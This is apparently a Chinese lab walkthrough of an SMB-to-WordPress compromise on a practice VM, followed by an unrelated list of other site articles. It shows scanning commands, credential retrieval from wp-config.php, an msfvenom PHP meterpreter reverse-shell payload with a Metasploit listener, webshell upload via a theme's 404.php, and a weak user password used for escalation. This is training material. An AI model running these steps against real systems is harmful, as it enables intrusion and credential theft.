SMB滲透

原創 嘿嘿! 2020-02-28 07:37

SMB滲透學習過程

1.SMB介紹

SMB(全稱是Server Message Block)是一個協議名,它能被用於Web連接和客戶端與服務器之間的信息溝通。SMB最初是IBM的貝瑞·費根鮑姆(Barry Feigenbaum)研製的,其目的是將DOS操作系統中的本地文件接口“中斷13”改造爲網絡文件系統。
百度百科
準備條件:kali 攻擊機:192.168.31.101
靶場: 192.168.31.62

2.探測過程

(1)使用netdiscover -r 192.168.31.1/24(子網掩碼)探測到局域網內的靶場地址爲:192.168.31.62
(2)使用nmap -sV 192.168.31.62(靶場地址)探測靶場開放的服務
nmap指令詳解
在這裏插入圖片描述nmap -A -v -T4 192.168.31.62在這裏插入圖片描述
針對smb協議弱點分析:使用smbclient -L 192.168.31.62
在這裏插入圖片描述
針對smb協議弱點分析
在這裏插入圖片描述
get deets.txt 到桌面,然後打開另一個終端,在桌面打開deets.txt

查看wp-config.php

cd/wordpress

get wp-config.php

gedit wp-config.php

在這裏插入圖片描述使用mysql嘗試連接

mysql 192.168.31.62 -u Admin -p

password : 粘貼密碼

ssh [email protected]

粘貼密碼

兩種方式都失敗

又因開啓了http協議則使用dirb http:192.168.31.62
找到wp-admin鏈接並打開
在這裏插入圖片描述
打開鏈接後使用賬號密碼登錄,登錄成功界面
在這裏插入圖片描述

製作webshell

在這裏插入圖片描述

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=4444 -f raw

在這裏插入圖片描述
複製產生代碼到本地

gedit shell.php

在這裏插入圖片描述

 啓動監聽
msfconsole

在這裏插入圖片描述

設置參數
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.31.101 (攻擊機地址)
run

在這裏插入圖片描述
啓動成功,等待連接
在這裏插入圖片描述
上傳webshell代碼

在這裏插入圖片描述
提交後瀏覽器輸入訪問點

192.168.31.62/wordpress/wp-content/themes/twentyfifteen/404.php

連接成功:在這裏插入圖片描述

在這裏插入圖片描述在這裏插入圖片描述

cat /etc/passwd

在這裏插入圖片描述
發現togie用戶
切換到togie用戶,密碼爲12345

在這裏插入圖片描述
提升權限
查找flag
在這裏插入圖片描述
視頻教程鏈接

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

基於vllm,探索產業級llm的部署

一、基本情況 vLLM 部署大模型 官方網址: https://vllm.ai github 地址:https://github.com/vllm-project/vllm vLLM 是一個快速且易於使用的庫,用於進行大型語言模型(LLM)

jsxyhelu 2024-04-24 14:24:31

5款開源、美觀、強大的WPF UI組件庫

前言 經常看到有小夥伴在DotNetGuide技術社區交流羣裏提問:WPF有什麼好用或者好看的UI組件庫?,今天大姚給大家分享5款開源、美觀、強大、簡單易用的WPF UI組件庫。 WPF介紹 WPF 是一個強大的桌面應用程序框架,用於構建具

追逐時光 2024-04-24 14:23:11

條款46:需要類型轉換時請爲模板定義非成員函數 條款24:若所有參數皆需類型轉換,請爲此採用non-member函數

  條款24 ----》條款24:若所有參數皆需類型轉換,請爲此採用non-member函數   **

htj10 2024-04-24 14:23:01

面試官:在原生input上面使用v-model和組件上面使用有什麼區別?

前言 還是上一篇面試官:來說說vue3是怎麼處理內置的v-for、v-model等指令? 文章的那個粉絲,面試官接着問了他另外一個v-model的問題。 面試官:vue3的v-model都用過吧,來講講。 粉絲:v-model其實就

你假裝沒察覺 2024-04-24 14:22:31

盟軍敢死隊2 360關

https://www.52pojie.cn/thread-1179852-1-1.html 下載後, 先D:\Comm2\Win10全屏補丁 運行全屏補丁. 然後Comm2P.exe 右鍵屬性,設置更改dpi, 設置爲應用程序的放縮. 然

張博的博客 2024-04-24 14:21:11

AI 模型

智譜 https://chatglm.cn/main/alltoolsdetail   kimi https://kimi.moonshot.cn/   百川 https://www.baichuan-ai.com/chat

2018 2024-04-24 14:16:10

網購消費投訴平臺

12315 https://www.12315.cn/cuser/ 互聯網信息服務投訴平臺 https://ts.isc.org.cn/#/login  

2018 2024-04-24 14:16:10

《最新出爐》系列入門篇-Python+Playwright自動化測試-40-錄製生成腳本

1.簡介 各種自動化框架都會有腳本錄製功能, playwright這麼牛叉當然也不例外。很早之前的selenium、Jmeter工具,發展到每種瀏覽器都有對應的錄製插件。今天我們就來看下微軟自動化框架playwright是如何錄製腳本的。很

北京-宏哥 2024-04-24 14:15:50

c語言使用

  如何驗證gcc正常使用,編譯c以及運行 過程 要驗證GCC(GNU Compiler Collection)是否正常使用,您可以按照以下步驟進行操作: 檢查GCC是否安裝:打開終端或命令行界面,輸入以下命令來檢查GCC是否已安裝:

馬昌偉 2024-04-24 14:15:10

springboot~mybatis-plus中使用TypeHandler做類型映射

mybatis-plus中,如果數據表字段類型與java實體字段類型不一樣,這時就需要做類型映射與轉換了,我們一般可以實現TypeHandler接口,或者繼承抽象類BaseTypeHandler,我們下面舉例來說明一下它的使用方法。 場景

張佔嶺 2024-04-24 14:13:50

Computer Basics 05 - Inside a Computer

Inside a computer Have you ever looked inside a computer case, or seen pictures of the inside of one? The small parts ma

emanlee 2024-04-24 14:11:39

Computer Basics 10 - Setting Up a Computer

  Setting up a computer  Настройка компьютера So you have a new computer and you're ready to set it up. This may seem li

emanlee 2024-04-24 14:11:39

代碼段——C#判斷時間是否在某個範圍

目錄1.使用DateTime.Compare()2.通過時間相減計算時間間隔,可以指定精確度 1.使用DateTime.Compare() 注意:兩個比較的時間,一定與相同的時間精度,比如都精確到分鐘,或都精確到日 注意:這裏我判斷指定時

hanzm 2024-04-24 14:11:09

java操作ftp server

參考:https://www.jianshu.com/p/2efc2669b736 POM依賴 <dependency> <groupId>commons-net</groupId>

tono 2024-04-24 14:11:09

Linux shell格式化XML文件

在沒有工具的情況下, cat a.xml | awk -F'><' '{printf "%s\n",$1;for (i=2;i<NF;i++) printf "<%s>",$i;printf "<%s\n" $NF}'  

tono 2024-04-24 14:11:09